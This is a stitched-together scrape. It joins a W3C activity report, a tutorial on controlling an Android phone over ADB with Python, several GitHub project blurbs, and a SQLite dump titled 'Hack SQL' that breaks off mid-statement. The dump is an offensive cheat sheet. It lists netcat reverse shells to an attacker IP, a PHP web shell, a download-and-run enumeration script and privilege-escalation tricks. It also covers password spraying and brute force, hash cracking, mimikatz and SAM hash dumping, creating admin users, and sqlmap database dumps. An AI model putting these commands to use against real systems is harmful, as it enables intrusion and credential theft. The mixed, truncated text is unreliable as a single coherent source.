Recent and ongoing work includes: Early API experiments by Adobe and Monotype have demonstrated the feasibility of a font enrichment API, where a server delivers a font with a minimal glyph repertoire and the client can query the full repertoire and request additional subsets on the fly. In other experiments, the Brotli compression used in WOFF 2 was extended to support shared dictionaries and patch updates. Metrics to quantify improvement are a current hot discussion topic. The group will meet at ATypI 2019 in Japan, to gather requirements from the international typography community. The group will first produce a report summarizing the strengths and weaknesses of each prototype solution by Q2 2020. SVG All SVG specifications SVG is an important and widely-used part of the Open Web Platform. The SVG Working Group focuses on aligning the SVG 2.0 specification with browser implementations, having split the specification into a currently-implemented 2.0 and a forward-looking 2.1. Current activity is on stabilization, increased integration with the Open Web Platform, and test coverage analysis. The Working Group was rechartered in March 2019. A new work item concerns native (non-Web-browser) uses of SVG as a non-interactive, vector graphics format. Audio The Web Audio Working Group was extended to finish its work on the Web Audio API, expecting to publish it as a Recommendation by year end. The specification enables synthesizing audio in the browser. Audio operations are performed with audio nodes, which are linked together to form a modular audio routing graph. Multiple sources, with different types of channel layout, are supported. This modular design provides the flexibility to create complex audio functions with dynamic effects. The first version of the Web Audio API is now feature complete and is implemented in all modern browsers. Work has started on the next version, and new features are being incubated in the Audio Community Group. Performance Web Performance All Web Performance specifications There are currently 18 specifications in development in the Web Performance Working Group, aiming to provide methods to observe and improve aspects of application performance of user agent features and APIs. The W3C team is looking at related work incubated in the W3C GPU for the Web (WebGPU) Community Group, which is poised to transition to a W3C Working Group. A preliminary draft charter is available. WebAssembly All WebAssembly specifications WebAssembly improves Web performance and power consumption by providing a virtual machine and execution environment that enables loaded pages to run native (compiled) code. It is deployed in Firefox, Edge, Safari and Chrome. The specification will soon reach Candidate Recommendation. WebAssembly enables near-native performance, optimized load time, and perhaps most importantly, a compilation target for existing code bases. While it has a small number of native types, much of the performance increase relative to JavaScript derives from its use of consistent typing. WebAssembly leverages decades of optimization for compiled languages, and its byte code is optimized for compactness and streaming (the web page starts executing while the rest of the code downloads). Network and API access all occur through accompanying JavaScript libraries; the security model is identical to that of JavaScript.
Requirements gathering and language development occur in the Community Group, while the Working Group manages test development, community review and progression of the specifications on the Recommendation Track.

Testing
Browser testing plays a critical role in the growth of the Web by: improving the reliability of Web technology definitions; improving the quality of implementations of these technologies by helping vendors detect bugs in their products; and improving the data available to Web developers on known bugs and deficiencies of Web technologies by publishing the results of these tests.

Browser Testing and Tools
The Browser Testing and Tools Working Group is developing WebDriver version 2, having published the W3C Recommendation of WebDriver last year. WebDriver acts as a remote control interface that enables introspection and control of user agents: it provides a platform- and language-neutral wire protocol through which out-of-process programs can remotely instruct the behavior of Web browsers, emulating the actions of a real person using the browser.

WebPlatform Tests
The WebPlatform Tests project now provides TestDriver, a mechanism which allows tests that previously needed to be run manually to be fully automated. TestDriver enables sending trusted key and mouse events, sending complex series of trusted pointer and key interactions for things like in-content drag-and-drop or pinch zoom, and even file upload. In 2014 W3C began work on this coordinated open-source effort to build a cross-browser test suite for the Web Platform, which the WHATWG and all major browsers have adopted.

Web of Data
All Data specifications
There have been several great success stories around the standardization of data on the web over the past year. Verifiable Claims is seeing significant uptake. It is also significant that the Decentralized Identifier WG charter received numerous favorable reviews and was just recently launched. JSON-LD has been a major success, with large-scale deployment on Web sites via schema.org:
- JSON-LD 1.1 has completed technical work and is about to transition to CR
- More than 25% of websites today include schema.org data in JSON-LD
- The Web of Things description has been in CR since May, making use of JSON-LD
- The Verifiable Credentials data model has been in CR since July, also making use of JSON-LD
- There is continued strong interest in decentralized identifiers
- The TAG is engaged in reframing core documents, such as the Ethical Web Principles, to include data on the web within their scope

Data is increasingly important for all organizations, especially with the rise of IoT and Big Data. W3C has a mature and extensive suite of standards relating to data, developed over two decades of experience, with plans for further work on making it easier for developers to work with graph data and knowledge graphs. Linked Data is about the use of URIs as names for things, the ability to dereference these URIs to get further information, and the inclusion of links to other data (a minimal dereferencing sketch appears at the end of this section). There are ever-increasing sources of open Linked Data on the Web, as well as data services that are restricted to the suppliers and consumers of those services. The digital transformation of industry seeks to exploit advanced digital technologies, enabling businesses to integrate horizontally along the supply and value chains, and vertically from the factory floor to the office floor. W3C is seeking to make it easier to support enterprise-wide data management and governance, reflecting the strategic importance of data to modern businesses.
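To make the Linked Data dereferencing idea above concrete, here is a minimal, hypothetical Python sketch: it asks a Linked Data URI for a machine-readable representation via HTTP content negotiation. The DBpedia URI is just an example of a public Linked Data source, and the use of the `requests` library and the `text/turtle` media type are assumptions for illustration, not anything mandated by the W3C documents discussed here.

```python
import requests

# A Linked Data URI names a thing; dereferencing it with an Accept
# header asks the server for a machine-readable description (here, Turtle).
uri = "http://dbpedia.org/resource/Tim_Berners-Lee"  # example public URI
resp = requests.get(uri, headers={"Accept": "text/turtle"}, timeout=30)
resp.raise_for_status()

# The returned document contains triples about the resource, including
# links (more URIs) to further data that can be dereferenced in turn.
print(resp.text[:500])
```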
Traditional approaches to data have focused on tabular databases (SQL/RDBMS), Comma Separated Value (CSV) files, and data embedded in PDF documents and spreadsheets. We are now in the midst of a major shift to graph data, with nodes and labeled directed links between them. Graph data is: faster than using SQL and its associated JOIN operations; more amenable to integrating data from heterogeneous sources; and better suited to situations where the data model is evolving. In the wake of the recent W3C Workshop on Graph Data, we are in the process of launching a Graph Standardization Business Group to provide a business perspective with use cases and requirements, and to coordinate technical standards work and liaisons with external organizations.

Web for All

Security, Privacy, Identity
All Security specifications, all Privacy specifications

Authentication on the Web
As the WebAuthn Level 1 W3C Recommendation published last March sees wide implementation and adoption of strong cryptographic authentication, work is proceeding on Level 2. The open-standard Web API exposes strong authentication technology built into platforms, browsers, operating systems (including mobile) and hardware, offering protection against hacking, credential theft and phishing attacks, and thus aiming to end the era of passwords as a security construct. You may read more in our March press release.

Privacy
An increasing number of W3C specifications are benefitting from privacy and security review; there are security and privacy aspects to every specification, and early review is essential. Working with the TAG, the Privacy Interest Group has updated the Self-Review Questionnaire: Security and Privacy. Other recent work of the group includes public blogging following its exploration of anti-patterns in standards and permission prompts.

Security
The Web Application Security Working Group adopted Feature Policy, which aims to allow developers to selectively enable, disable, or modify the behavior of certain browser features and APIs within their applications; and Fetch Metadata, which aims to provide servers with enough information to make a priori decisions about whether or not to service a request, based on the way it was made and the context in which it will be used. The Web Payment Security Interest Group, launched last April, convenes members from W3C, EMVCo, and the FIDO Alliance to discuss cooperative work to enhance the security and interoperability of Web payments (read more about payments).

Internationalization (i18n)
All Internationalization specifications, educational articles related to Internationalization, spec developers checklist
Only about a quarter of current Web users use English online, and that proportion will continue to decrease as the Web reaches more and more communities of limited English proficiency. If the Web is to live up to the "World Wide" portion of its name and truly work for stakeholders all around the world, it must support the needs of worldwide users as they engage with content in their various languages. The growth of epublishing also brings requirements for new features and improved typography on the Web, and it is important to ensure the needs of local communities are captured. The W3C Internationalization Initiative was set up to increase in-house resources dedicated to accelerating progress in making the World Wide Web "worldwide" by gathering user requirements, supporting developers, and education and outreach.
For an overview of current projects see the i18n radar. W3C's Internationalization efforts progressed on a number of fronts recently:
- Requirements: new African and European language groups will work on gap analysis, errata and layout requirements. Gap analysis: the Japanese, Devanagari, Bengali, Tamil, Lao, Khmer, Javanese, and Ethiopic gap-analysis documents were updated. Layout requirements: notable progress was tracked in the Southeast Asian Task Force, while work continues on Chinese layout requirements.
- Developer support: the i18n WG continues active review of specifications of the WHATWG and other W3C Working Groups. A short review checklist offers an easy way to begin a self-review: it helps spec developers understand which aspects of their spec are likely to need attention for internationalization, points them to more detailed checklists for the relevant topics, and also helps those reviewing specs for i18n issues. Strings on the Web: Language and Direction Metadata lays out issues and discusses potential solutions for passing information about language and base direction along with strings in JSON or other data formats (a minimal illustration appears at the end of this section); the document was rewritten for clarity and expanded. The group is collaborating with the JSON-LD and Web Publishing groups to develop a plan for updating RDF, JSON-LD and related specifications to handle metadata for the base direction of text (bidi).
- User-friendly test format: a new format was developed for Internationalization Test Suite tests, which displays helpful information about how each test works. This is particularly useful because those tests are pointed to by educational materials and gap-analysis documents. Web Platform Tests: a large number of tests in the i18n test suite have been ported to the WPT repository, including css-counter-styles, css-ruby, css-syntax, css-text, css-text-decor, css-writing-modes, and css-pseudo.
- Education and outreach: for all educational materials, see the HTML & CSS Authoring Techniques.

Web Accessibility
All Accessibility specifications, WAI resources
The Web Accessibility Initiative supports W3C's Web for All mission. Recent achievements include:
- Education and training: Inaccessibility of CAPTCHA was updated to bring our analysis and recommendations up to date with CAPTCHA practice today, concluding two years of extensive work and invaluable input from the public (read more on the W3C Blog). Learn why your web content and applications should be accessible. The Education and Outreach Working Group has completed the revision and updating of the Business Case for Digital Accessibility.
- Accessibility guidelines: the Accessibility Guidelines Working Group has continued to update the WCAG Techniques and Understanding WCAG 2.1 documents, and published a Candidate Recommendation of the Accessibility Conformance Testing Rules Format 1.0 to improve inter-rater reliability when evaluating the conformance of web content to WCAG. An updated charter is being developed to host work on "Silver", the next generation of accessibility guidelines, alongside WCAG 2.2.
There are accessibility aspects to most specifications; check your work with the FAST checklist.
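Returning to the Strings on the Web discussion above: to make the string-metadata problem concrete, here is a minimal, hypothetical Python sketch of the kind of structure that document discusses, a string accompanied by its language and base direction so a consumer can render bidirectional text correctly. The field names are illustrative assumptions, not anything defined by that document.

```python
import json

# A bare JSON string carries no language or direction information.
# Pairing the text with explicit metadata lets a consumer pick the right
# fonts, spell-checking, and bidi (base direction) handling.
greeting = {
    "value": "مرحبا بالعالم",  # "Hello, world" in Arabic
    "lang": "ar",              # BCP 47 language tag
    "dir": "rtl",              # base direction of the text
}
print(json.dumps(greeting, ensure_ascii=False, indent=2))
```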
Outreach to the world

W3C Developer Relations
To foster the excellent feedback loop between Web standards development and Web developers, and to grow participation from that diverse community, recent W3C Developer Relations activities include:
- @w3cdevs, which tracks the enormous amount of work happening across W3C
- The W3C Track during the Web Conference 2019 in San Francisco
- Tech videos: W3C published the 2019 Web Games Workshop videos
- The 16 September 2019 Developer Meetup in Fukuoka, Japan, open to all, combining a set of technical demos prepared by W3C groups with a series of talks on a selected set of W3C technologies and projects
- W3C's involvement, with Mozilla, Google, Samsung, Microsoft and Bocoup, in the organization of ViewSource 2019 in Amsterdam (read more on the W3C Blog)

W3C Training
In partnership with edX, W3C's MOOC training program W3Cx offers a complete "Front-End Web Developer" (FEWD) professional certificate program consisting of a suite of five courses on the foundational languages that power the Web: HTML5, CSS and JavaScript. We count nearly 900K students from all over the world.

Translations
Many Web users rely on translations of documents developed at W3C, whose official language is English. W3C is extremely grateful for the continuous efforts of its community in ensuring that our various deliverables in general, and our specifications in particular, are made available in other languages, for free, exposing them to a much more diverse set of readers. Last spring we developed a more robust system, a new listing of translations of W3C specifications, and updated instructions on how to contribute to our translation efforts.

W3C Liaisons
Liaison and coordination with numerous organizations and Standards Development Organizations (SDOs) is crucial for W3C to:
- make sure standards are interoperable
- coordinate our respective agendas in Internet governance: W3C participates in ICANN, GIPO, IGF, and the I* organizations (ICANN, IETF, ISOC, IAB)
- ensure at the government liaison level that our standards work is officially recognized when important to our membership, so that products based on it (often made by our members) can be part of procurement orders; W3C has ARO/PAS status with ISO and participates in the EU MSP and Rolling Plan on Standardization
- ensure the global set of Web and Internet standards forms a compatible stack of technologies, at both the technical and policy level (patent regime, fragmentation, use in policy making)
- promote standards adoption equally by industry, the public sector, and the public at large

Coralie Mercier, Editor, W3C Marketing & Communications
Masudbro94 / Python Hacked Mobile Phone
How you can Control your Android Device with Python, by Kush (originally published in ITNEXT, Apr 15, 2021, 7 min read)
(Photo by Caspar Camille Rubin on Unsplash)

Introduction
A while back I was thinking of ways in which I could annoy my friends by spamming them with messages for a few minutes, and while doing some research I came across the Android Debug Bridge. In this quick guide I will show you how you can interface with it using Python and how to create two quick scripts. The ADB (Android Debug Bridge) is a command-line tool (CLI) which can be used to control and communicate with an Android device. You can do many things such as install apps, debug apps, find hidden features and use a shell to interface with the device directly. To enable the ADB, your device must first have Developer Options unlocked and USB debugging enabled. To unlock Developer Options, go to your device's settings, scroll down to the About section and find the build number of the current software on the device. Tap the build number 7 times and Developer Options will be enabled. Then you can go to the Developer Options panel in the settings and enable USB debugging from there. Now the only other thing you need is a USB cable to connect your device to your computer. Here is what today's journey will look like: installing the requirements; getting started; the basics of writing scripts; creating a selfie timer; creating a definition searcher.

Installing the requirements
The first of the two things we need to install is the ADB tool on our computer. This comes bundled with Android Studio, so if you already have that then do not worry. Otherwise, you can head over to the official docs, and at the top of the page there should be instructions on how to install it. Once you have installed the ADB tool, you need to get the Python library which we will use to interface with the ADB and our device. You can install the pure-python-adb library using pip install pure-python-adb. Optional: to make things easier for us while developing our scripts, we can install an open-source program called scrcpy, which allows us to display and control our Android device from our computer using a mouse and keyboard. To install it, head over to the GitHub repo and download the correct version for your operating system (Windows, macOS or Linux). If you are on Windows, extract the zip file into a directory and add this directory to your path, so that we can access the program from anywhere on our system just by typing scrcpy into a terminal window.

Getting started
Now that all the dependencies are installed, we can start up our ADB and connect our device. Firstly, connect your device to your PC with the USB cable; if USB debugging is enabled, a message should pop up asking if it is okay for your PC to control the device. Simply answer yes. Then, on your PC, open a terminal window and start the ADB server by typing adb start-server. This should print out the following messages:
* daemon not running; starting now at tcp:5037
* daemon started successfully
If you also installed scrcpy, then you can start that by just typing scrcpy into the terminal.
However, this will only work if you added it to your path; otherwise you can open the executable by changing your terminal directory to where you installed scrcpy and typing scrcpy.exe. Hopefully, if everything works out, you should be able to see your device on your PC and control it using your mouse and keyboard. Now we can create a new Python file and check if we can find our connected device using the library (a reconstruction of this snippet appears after this section): we import the AdbClient class and create a client object with it, get a list of connected devices, and lastly take the first device out of our list (it is generally the only one there when only one device is connected).

The basics of writing scripts
The main way we are going to interface with our device is through the shell; with it we can send commands to simulate a touch at a specific location or to swipe from A to B. To simulate screen touches (taps), we first need to work out how the screen coordinates work. To help with this we can activate the pointer location setting in the Developer Options; once activated, wherever you touch on the screen, the coordinates for that point appear at the top. (Diagram: how the coordinate system works.) The top-left corner of the display has the x and y coordinates (0, 0), and the bottom-right corner's coordinates are the largest possible values of x and y. Now that we know how the coordinate system works, we need to check out the different commands we can run. I have made a list of commands and how to use them for quick reference:
input tap x y
input text "hello world!"
input keyevent eventID
Here is a list of some common eventIDs: 3: home button; 4: back button; 5: call; 6: end call; 24: volume up; 25: volume down; 26: turn device on or off; 27: open camera; 64: open browser; 66: enter; 67: backspace; 207: contacts; 220: brightness down; 221: brightness up; 277: cut; 278: copy; 279: paste. If you want to find more, there is a long list of them online.

Creating a selfie timer
Now that we know what we can do, let's start doing it. In this first example I will show you how to create a quick selfie timer. To get started we need to import our libraries and create a connect function to connect to our device (see the sketch after this section). The connect function is identical to the previous example of how to connect to your device, except that here we return the device and client objects for later use. In our main code, we can call the connect function to retrieve the device and client objects. From there we can open up the camera app, wait 5 seconds and take a photo. It's really that simple! As I said before, this simply replicates what you would usually do, so when thinking about how to automate something it is best to do it manually first and write down the steps.
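The original article embeds these snippets as gists that did not survive scraping. As a reconstruction under that caveat, here is a minimal sketch of the connection code and the selfie timer using pure-python-adb; the connect helper, the 5-second delay, and the use of keyevent 27 both to open the camera and to trigger the shutter follow the article's description, but the exact gist contents are assumptions.

```python
import time

from ppadb.client import Client as AdbClient


def connect(host="127.0.0.1", port=5037):
    # Connect to the local ADB server and grab the first attached device.
    client = AdbClient(host=host, port=port)
    devices = client.devices()
    if not devices:
        raise RuntimeError("No devices attached - is USB debugging enabled?")
    return devices[0], client


if __name__ == "__main__":
    device, client = connect()
    device.shell("input keyevent 27")  # eventID 27: open the camera app
    time.sleep(5)                      # the 5-second selfie countdown
    device.shell("input keyevent 27")  # camera key again to press the shutter
```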
Creating a definition searcher
We can do something a bit more complex now: ask the browser to find the definition of a particular word, then take a screenshot and save it on our computer. The basic flow of this program is:
1. Open the browser
2. Click the search bar
3. Enter the search query
4. Wait a few seconds
5. Take a screenshot and save it
But before we get started, you need to find the coordinates of the search bar in your default browser; you can use the method I suggested earlier to find them easily. For me they were (440, 200). To start, we import the same libraries as before and reuse the same connect method. In our main function we call the connect function, and we also assign a variable to the x and y coordinates of our search bar. Notice that this is a string and not a list or tuple, so that we can easily incorporate the coordinates into our shell command. We also take an input from the user to see what word they want the definition for, and add that query to a full sentence which will then be searched, so that we always get a definition. After that we can open the browser and input our search query into the search bar. We use eventID 66 to simulate the press of the enter key and execute our search; if you want, you can change the wait timings to suit your needs. Lastly, we take a screenshot using the screencap method on our device object and save it as a .png file; we must open the file in write-bytes mode because the screencap method returns bytes representing the image. If all went according to plan, you should have a quick script which searches for a specific word (a reconstruction follows below). Here it is working on my phone: (GIF: the definition searcher example running on a phone.)
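Again, the embedded gist is missing from the scrape, so here is a minimal reconstruction of the definition searcher following the steps above. The (440, 200) search-bar coordinates, the query wording, and the wait times are taken from or implied by the article; treat the details as assumptions to adapt for your own device.

```python
import time

from ppadb.client import Client as AdbClient


def connect(host="127.0.0.1", port=5037):
    client = AdbClient(host=host, port=port)
    devices = client.devices()
    if not devices:
        raise RuntimeError("No devices attached - is USB debugging enabled?")
    return devices[0], client


if __name__ == "__main__":
    device, client = connect()
    search_bar = "440 200"  # x y of the search bar, kept as a string for the shell command

    word = input("Which word do you want defined? ")
    # Full sentence so we always get a definition; Android's input tool
    # expects %s in place of spaces.
    query = f"definition of {word}".replace(" ", "%s")

    device.shell("input keyevent 64")        # eventID 64: open the browser
    time.sleep(2)
    device.shell(f"input tap {search_bar}")  # focus the search bar
    time.sleep(1)
    device.shell(f"input text {query}")      # type the query
    device.shell("input keyevent 66")        # eventID 66: press enter to search
    time.sleep(3)                            # let the results load

    # screencap returns the raw PNG bytes, hence write-bytes mode.
    screenshot = device.screencap()
    with open("definition.png", "wb") as f:
        f.write(screenshot)
```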
Final thoughts
Hopefully you have learned something new today; personally, I never even knew this was possible before I did some research into it. The cool thing is that you can do anything you normally would be able to do, and more, since it just simulates your own touches and actions! I hope you enjoyed the article, and thank you for reading! 💖
MigVega / SLAM2REFThis project allows the alignment and correction of LiDAR-based SLAM session data with a reference map or another session, as well as the retrieval of 6-DoF poses with an accuracy of up to 3 cm, given an accurate TLS point cloud as a reference map (the map should be accurate at least with regard to the position of permanent elements such as walls and columns).
rzou15 / Object Detection In Point Cloud Road BoundaryObject detection in point clouds is popular in HD mapping and sensor-based autonomous driving. There are basically four types of objects you can encounter in a daily scenario: road surface, which contains painted lane markings and the pavement area; support facilities, which contain road boundaries (guardrails and curbs), road signs, light poles, etc.; uncorrelated objects, for example sidewalks, buildings, etc.; and moving objects, such as pedestrians, vehicles and bicycles. In this project, please search references, then design and prototype your road boundary (guardrail) detection algorithm (a minimal starting sketch follows).
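As a starting point for the prototyping task, here is a minimal, hypothetical Python sketch of one common curb/boundary cue: local height variation in a 2D grid over the point cloud. A real guardrail detector needs far more (intensity, scan-line geometry, tracking over frames); the grid size and height thresholds below are illustrative assumptions, not values from the project.

```python
import numpy as np


def boundary_candidates(points, cell=0.5, min_dz=0.15, max_dz=0.6):
    """Flag grid cells whose internal height spread looks like a curb step.

    points: (N, 3) array of x, y, z coordinates from a LiDAR scan.
    Returns the (x, y) centers of candidate boundary cells.
    """
    ij = np.floor(points[:, :2] / cell).astype(np.int64)
    # Sort points so that points sharing a 2D grid cell are contiguous.
    order = np.lexsort((ij[:, 1], ij[:, 0]))
    ij, pts = ij[order], points[order]
    splits = np.flatnonzero(np.any(np.diff(ij, axis=0), axis=1)) + 1

    candidates = []
    for cell_pts in np.split(pts, splits):
        dz = cell_pts[:, 2].max() - cell_pts[:, 2].min()
        if min_dz <= dz <= max_dz:  # curb-like step: not flat road, not a wall
            candidates.append(cell_pts[:, :2].mean(axis=0))
    return np.asarray(candidates)


# Example with synthetic points:
# pts = np.random.rand(10000, 3) * [20.0, 20.0, 0.05]
# print(boundary_candidates(pts))
```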
Talentica / WifiIndoorPositioning:rocket: Evaluation of a device's location using RSSI values of access points and reference points built from Wi-Fi readings (a minimal sketch of the underlying idea follows).
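For context, a common way such systems relate RSSI to location is the log-distance path-loss model plus nearest-reference-point (fingerprint) matching. The following is a generic, hypothetical Python sketch of that idea, not the repository's actual algorithm; the transmit power and path-loss exponent are assumptions that must be calibrated per environment.

```python
import math


def rssi_to_distance(rssi_dbm, tx_power_dbm=-40.0, path_loss_n=2.7):
    # Log-distance path-loss model: rssi = tx_power - 10 * n * log10(d)
    return 10 ** ((tx_power_dbm - rssi_dbm) / (10.0 * path_loss_n))


def nearest_reference_point(reading, reference_points):
    """Fingerprinting: pick the reference point whose recorded RSSI
    vector is closest (Euclidean) to the live reading.

    reading: {ap_id: rssi_dbm}
    reference_points: {(x, y): {ap_id: rssi_dbm}}
    """
    def dist(fingerprint):
        shared = reading.keys() & fingerprint.keys()
        if not shared:
            return float("inf")
        return math.sqrt(sum((reading[ap] - fingerprint[ap]) ** 2 for ap in shared))

    return min(reference_points, key=lambda xy: dist(reference_points[xy]))


# Example with made-up fingerprints:
refs = {(0, 0): {"ap1": -40, "ap2": -70}, (5, 0): {"ap1": -70, "ap2": -42}}
print(nearest_reference_point({"ap1": -43, "ap2": -68}, refs))  # -> (0, 0)
```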
Don-No7 / Hack SQL
--
-- File generated with SQLiteStudio v3.2.1 on Sun Feb 7 14:58:28 2021
--
-- Text encoding used: System
--
PRAGMA foreign_keys = off;
BEGIN TRANSACTION;

-- Table: Commands
CREATE TABLE Commands (Command_No INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL, Name TEXT REFERENCES Programs (Name) NOT NULL, Description TEXT NOT NULL, Command TEXT, File BLOB);
INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES
    (1, 'Kerbrute', 'brute force a single user password', 'kerbrute bruteuser [flags]', NULL),
    (2, 'Kerbrute', 'brute force username:password combos from a file or stdin', 'kerbrute bruteforce [flags]', NULL),
    (3, 'Kerbrute', 'test a single password against a list of users', 'kerbrute passwordspray [flags]', NULL),
    (4, 'Kerbrute', 'enumerate valid domain usernames via Kerberos', 'kerbrute userenum [flags]', NULL),
    (5, 'Name-That-Hash', 'find the hash type of a string', 'nth --text ''<hash>''', NULL),
    (6, 'Name-That-Hash', 'find the hash type of a file', 'nth --file <hash file>', NULL),
    (7, 'Nmap', 'scan for vulnerabilities', 'nmap --script vuln <HOST_IP>', NULL),
    (8, 'Nikto', 'scan a host for vulnerabilities', 'nikto -h <HOST_IP>', NULL),
    (9, 'SMBClient', 'check for misconfigured anonymous login', 'smbclient -L \\\\<HOST_IP>', NULL),
    (10, 'Hydra', 'brute force a webpage looking for usernames', 'hydra -l <user wordlist> -p 123 <HOST_IP> http-post-form ''/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=<output string on failure>''', NULL),
    (11, 'SMBMap', 'enumerate SMB file shares', 'smbmap -u <user> -p <pass> -H <host IP>', NULL),
    (12, 'WPScan', 'enumerate a WordPress website', 'wpscan --url <wp site> --enumerate --plugins-detection', NULL),
    (13, 'WPScan', 'enumerate through known usernames', 'wpscan --url <HOST_IP> --usernames <USERNAME_FOUND> --passwords wordlist.dic', NULL),
    (14, 'PowerShell', 'bypass execution policy', 'powershell.exe -exec bypass', NULL),
    (15, 'TheHarvester', 'gather information from online sources', 'theharvester -d <domain> -l <#> -g -b google', NULL),
    (16, 'Netcat', 'open a listener', 'nc -lvnp <port #>', NULL),
    (17, 'Netcat', 'connect to a computer', 'nc <attacker ip> <attacker port>', NULL),
    (18, 'GoBuster', 'enumerate directories on a website with a cookie', 'gobuster dir -u http://<IP> -w <wordlist> -x <extension> -c PHPSESSID=<cookie val>', NULL),
    (19, 'SQLMap', 'map SQL at an IP', 'sqlmap -r <IP> --batch --force-ssl', NULL),
    (20, 'John the Ripper', 'use a wordlist to crack hashes', 'john <HASHES_FILE> --wordlist=<wordlist>', NULL),
    (21, 'John the Ripper', 'crack an unshadowed password file', 'john <Unshadowed passwds>', NULL),
    (22, 'Unshadow', 'combine the /etc/passwd and /etc/shadow files for cracking', 'unshadow <passwd> <shadow>', NULL),
    (23, 'Hashcat', 'crack hashes with a wordlist', 'hashcat -m <hash type> -a 0 -o <output file> <hash file> <wordlist> --force', NULL),
    (26, 'Enum4Linux', 'basic command', 'enum4linux -a <IP>', NULL),
    (27, 'SMBClient', 'connect to an SMB share', 'smbclient //<IP>/<share> -U <username>', NULL),
    (28, 'Netcat', 'connect with shell (-e does not always work)', 'nc -e /bin/sh <ATTACKING-IP> 80', NULL),
    (29, 'Netcat', 'connect with shell (-e does not always work)', '/bin/sh | nc ATTACKING-IP 80', NULL),
    (30, 'Netcat', 'done on the target', 'rm -f /tmp/p; mknod /tmp/p p && nc ATTACKING-IP 4444 0</tmp/p | /bin/sh 1>/tmp/p', NULL),
    (31, 'SQLMap', 'check a form for SQL injection', 'sqlmap -o -u "http://meh.com/form/" --forms', NULL),
    (32, 'SQLMap', 'automated SQL scan', 'sqlmap -u <URL> --forms --batch --crawl=10 --cookie=jsessionid=54321 --level=5 --risk=3', NULL),
    (33, 'CrackMapExec', 'run a mimikatz module', 'crackmapexec smb <target(s)> -u <username> -p <password> --local-auth -M mimikatz', NULL),
    (34, 'CrackMapExec', 'command execution', 'crackmapexec smb <target(s)> -u ''<username>'' -p ''<password>'' -x whoami', NULL),
    (35, 'CrackMapExec', 'check logged-in users', 'crackmapexec smb <target(s)> -u ''<username>'' -p ''<password>'' --lusers', NULL),
    (36, 'CrackMapExec', 'dump local SAM hashes', 'crackmapexec <target(s)> -u ''<username>'' -p ''<password>'' --local-auth --sam', NULL),
    (37, 'CrackMapExec', 'null session login', 'crackmapexec smb <target(s)> -u '''' -p ''''', NULL),
    (38, 'CrackMapExec', 'list modules', NULL, NULL),
    (39, 'CrackMapExec', 'pass the hash', NULL, NULL),
    (41, 'IKE-Scan', 'attack a pre-shared key with a dictionary', 'psk-crack -d </path/to/dictionary> <psk file>', NULL),
    (42, 'IKE-Scan', 'if you find a SonicWALL VPN using aggressive mode it will require a group id; the default group id is GroupVPN', 'ike-scan <IP> -A -id GroupVPN', NULL),
    (43, 'IKE-Scan', 'find aggressive mode VPNs and save for use with psk-crack', 'ike-scan <IP> -A -P<file out>', NULL),
    (44, 'John the Ripper', 'crack passwords with KoreLogic rules', 'for ruleset in `grep KoreLogicRules john.conf | cut -d: -f 2 | cut -d\] -f 1`; do ./john --rules:${ruleset} -w:<wordlist> <password_file> ; done', NULL),
    (45, 'Nmap', 'create a list of IP addresses', 'nmap -sL -n 192.168.1.1-100,102-254 | grep "report for" | cut -d " " -f 5 > ip_list_192.168.1.txt', NULL),
    (46, 'Linux commands', 'mount an NFS share on Linux', 'mount -t nfs server:/share /mnt/point', NULL),
    (47, 'PowerShell', 'create a new user', 'net user <username> <password> /ADD', NULL),
    (48, 'PowerShell', 'add a user to a group (normally Administrators)', 'net localgroup <group> <username> /ADD', NULL),
    (49, 'PSK-Crack', 'brute force with specified length and specified chars (if left blank the default is 36)', 'psk-crack -b <#> --charset="<charlist>" <key file>', NULL),
    (50, 'PSK-Crack', 'dictionary attack', 'psk-crack -d <file> <key file>', NULL),
    (51, 'SQLMap', 'check a form for SQL injection', 'sqlmap -o -u "<url of form>" --forms', NULL),
    (52, 'SQLMap', 'scan a URL for union + error-based injection with a MySQL backend, use a random user agent, and dump the database', 'sqlmap -u "<form URL>?id=1" --dbms=mysql --tech=U --random-agent --dump', NULL);

-- Table: Exploits
CREATE TABLE Exploits (Target TEXT, Type TEXT, Criteria TEXT, Method TEXT, Code TEXT, Result TEXT, Notes TEXT);
INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES
    ('Website', 'Injection', 'ability to write to the website folder', 'create or edit a page of the website and insert the code to get remote access to the machine', '<?php system($_GET[''cmd'']); ?>', 'execute code via URL', '<URL of php>?cmd=<code to execute>'),
    ('Linux', 'Priv Enum', 'shell', 'enter the code into the shell to find vulnerabilities in the machine', 'find / -perm -u=s -type f 2>/dev/null', 'SUID binaries', 'link output to GTFOBins and exploit'),
    ('Box', 'Priv Esc', 'Python binary running as root', 'generate a shell using python to gain root access', 'python3 -c "import pty;pty.spawn(''/bin/sh'');"', 'root shell', 'change the python variable accordingly'),
    ('SQL', 'Priv Esc', 'MySQL binary running as root', 'enter the MySQL command line and break out into root by using the code', 'mysql> \! /bin/sh', 'get a shell from root-privileged SQL', NULL),
    ('Linux', 'Priv Enum', 'low-privilege shell', 'use the code to search for programs that run as sudo without a password', 'sudo -l', NULL, 'lists programs that can be used with sudo and no password'),
    ('Windows', 'Priv Esc', 'Powershell', 'use the code to enumerate priv esc opportunities', 'wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """', 'list of unquoted service paths that might be used for priv esc', NULL),
    ('Website', 'LFI', NULL, NULL, NULL, NULL, NULL),
    ('Linux', 'Priv Enum', NULL, 'use LinEnum.sh to enumerate a Linux box', 'wget https://www.linenum.sh/ -O /dev/shm/LinEnum.sh; chmod +x /dev/shm/LinEnum.sh; /dev/shm/LinEnum.sh | tee /dev/shm/lininfo.txt', 'a file, /dev/shm/lininfo.txt, with priv esc info', 'it is possible to use other download methods, like curl or others found on Google'),
    ('Website', 'No-Auth', NULL, NULL, NULL, NULL, NULL),
    ('Website', 'Re-Registration', NULL, NULL, NULL, NULL, NULL),
    ('Website', 'JWT', 'a site that uses JSON as cookies', 'edit the information (with BURP) that is going to the website to gain access without authentication', NULL, NULL, NULL);

-- Table: Programs
CREATE TABLE Programs (Name text PRIMARY KEY NOT NULL UNIQUE, Stage TEXT, Description text, Info text, Features TEXT, Target TEXT, Offensive BOOLEAN, commands TEXT);
INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES
    ('Nmap', 'Enum', 'Used for scanning a network/host to gather more information', 'man pages on linux', 'Scanning', 'All', 'Y', NULL),
